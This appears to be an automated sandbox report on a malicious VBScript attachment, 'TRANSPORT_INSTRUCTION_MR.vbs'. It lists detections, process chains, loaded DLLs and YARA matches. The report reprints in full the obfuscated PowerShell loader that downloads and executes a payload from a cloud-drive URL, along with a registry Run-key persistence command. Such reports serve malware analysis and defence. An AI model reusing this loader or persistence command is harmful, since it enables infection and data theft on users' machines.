reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F3B596 3_2_00007FF848F3B596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF848F3C342 3_2_00007FF848F3C342
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0461F258 7_2_0461F258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0461FB28 7_2_0461FB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0461A798 7_2_0461A798
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0461EF10 7_2_0461EF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A7B330 9_2_00A7B330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A74AC8 9_2_00A74AC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A73EB0 9_2_00A73EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A7EE60 9_2_00A7EE60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_00A741F8 9_2_00A741F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_28213090 9_2_28213090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_282158DB 9_2_282158DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2821C188 9_2_2821C188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_282151D0 9_2_282151D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2821AE20 9_2_2821AE20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2821E3A8 9_2_2821E3A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2821003B 9_2_2821003B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_28210040 9_2_28210040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_28217298 9_2_28217298
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2821238A 9_2_2821238A
Java / VBScript file with very long strings (likely obfuscated code)
Source: TRANSPORT_INSTRUCTION_MR.vbs Initial sample: Strings found which are bigger than 50
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
Yara signature match
Source: amsi32_4424.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@18/9@6/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Prehatred.Fid Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pejvmc3m.thk.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSPORT_INSTRUCTION_MR.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4424
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: TRANSPORT_INSTRUCTION_MR.vbs Virustotal: Detection: 37%
Source: TRANSPORT_INSTRUCTION_MR.vbs ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSPORT_INSTRUCTION_MR.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Riffelgange = 1;$Authorish='Substrin';$Authorish+='g';Function Shockhead($Kaputt){$Spisefrikvarterernes=$Kaputt.Length-$Riffelgange;For($Ratihabumr=5; $Ratihabumr -lt $Spisefrikvarterernes; $Ratihabumr+=(6)){$Udsagnsleddenes+=$Kaputt.$Authorish.Invoke($Ratihabumr, $Riffelgange);}$Udsagnsleddenes;}function sabotage($Velal){& ($Tanquelinian) ($Velal);}$Greenheart=Shockhead 'OutraMIndowoAigrezBestoiSkspolMusikl ,utsa Brne/Gr.nd5.itin.Afdel0Up,ai Zw ng(SynapWNjereiCoresnD,agsdTosdeoHerrgwkroe sbil,e .runeNStrafTPraec Forma1Myoli0The,m. Bort0Opfi,;Enkel Arch,WIrradiObsern Kyst6.odra4Banju; eval For axUdban6Czare4Spat ;under TayerrUnd,iv tred:M.ckb1Jacqu2Maime1 Seri.Deesk0Allop) Brad BeregGHemodeSalewc DiskkRandmoVolit/ Qu z2 Kruk0Fo.nu1Ordfo0 enio0,anlo1jetst0Invas1Gaska Knif.FS criiRgerirGillyeStridf Toitovexdex.nnek/Gener1Orke.2minst1Bo.it. ,eha0Dia,o ';$Feline=Shockhead 'StripUOverts PoliegalehrOsobe-ForaaASkinkgOmgiveEnwinnSanc tJinri ';$ostler=Shockhead 'goo,whKvikkt Nikot ousp udstsNemme:Ha dw/Tjles/GorvadAntiprChivei Sie.vKontreDansk.FellygPrivaoP eezoViolig B,dflAmpeleO var.IsospcSubtroMowbumJacke/Tilbau VictcOpsge?RibboeTurp.xI,prgpTelevoHofchrhavait pakk= NurtdbearloTrevewPutnanFu,ill.resuoextena SpirdSe vi& SundiHistodManja= Allo1FrugthEncheJ estyNymphvNucl gappasAA ninV U.pebPoachPUgtetJJol,e7 .eww5Lob.tW TyphNEndomnAnalyYharmem AliqHadvenv Al ypTurnuQGenerDKropskNy.tiE.nobs9 WindK BeunTMon sfapoloZDisozPSnesksAfvaekInte ';$Olympier=Shockhead 'Det r>R dio ';$Tanquelinian=Shockhead 'Succei,nackeFascixCiv l ';$Aminobenzamide = Shockhead 'PreloeForcec FilihGuelpoNone. B cki%B,ahmainterpInserpBrunldUd rmaAnd.lt KarbaAquar% Bri.\ kattPBlodrrIndhoe MonahNav,ea,egiststr,irmocame B lldAfsky.Unc.vFDomsfiJav.ldRevi Oc.i&Stnne&Chrys Skrine OvercHendehMelleoDm,ni Tritu$ sept ';sabotage (Shockhead 'Bigba$Storhg R,tilTrim oUnadvb DissaSamm.lCr,nk: CecoAForemaKi,kenUnfledSportePsychlToledyBramsdTan eeNrga nSmaafs Exce=rotte(T.skncB dummvalerdDelib Demat/InaudcBiogr Fa el$WretcAnormam ForsiEnneanmidnio ColebUnexteKlonen undsz SkumaBevilmTvrf i DestdFlexueB,lim)Adnot ');sabotage (Shockhead 'Form.$WienegPal.nlAlleyoballobEnedia BlgelStyre:ExpouUSchoon,mbets EngahLydliu Hel.nK.tukn.kraleUn.erdAlcoh=Overf$,iurooNaticsK,loltDimpll S,mieDann rforgl.Oplgns ominp DubblafgrsiGangat alsr(U orb$musheOGl.cilOrdney nordmTeorip iploi,ympae HeltrBeta )Fresn ');$ostler=$Unshunned[0];sabotage (Shockhead 'Super$Ups agHeterlPal.to Smelb Br.aaParanl mikr:SloucMHasareWhalesFrdigsPentaa Gen.nEvitisVirag=RadioNAitche G,unwPeete-Prea,Odykkeb Ma sj.verbeH kkecAnl,st Phy. UdbarS,eceny,emuns FiprtMelame Klipmalkef..vnbyN UrokeSaltatEndur.samarWStavneAp,erbDikotCUnderl TrokiInj reStudenStrimtDowse ');sabotage (Shockhead 'Rigni$A ticMEjende Be nslichestraneaTono,nGgesnsGerma.,etalHW.noneThereabeford emme strorPhi.os klo,[Joint$biskuFforbieShor.l Yletimock Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prehatred.Fid && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Andelsbevaegelsen" /t REG_EXPAND_SZ /d "%Before110% -w 1 $Tohndig=(Get-ItemProperty -Path 'HKCU:\Dirigent\').skemaformernes;%Before110% ($Tohndig)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
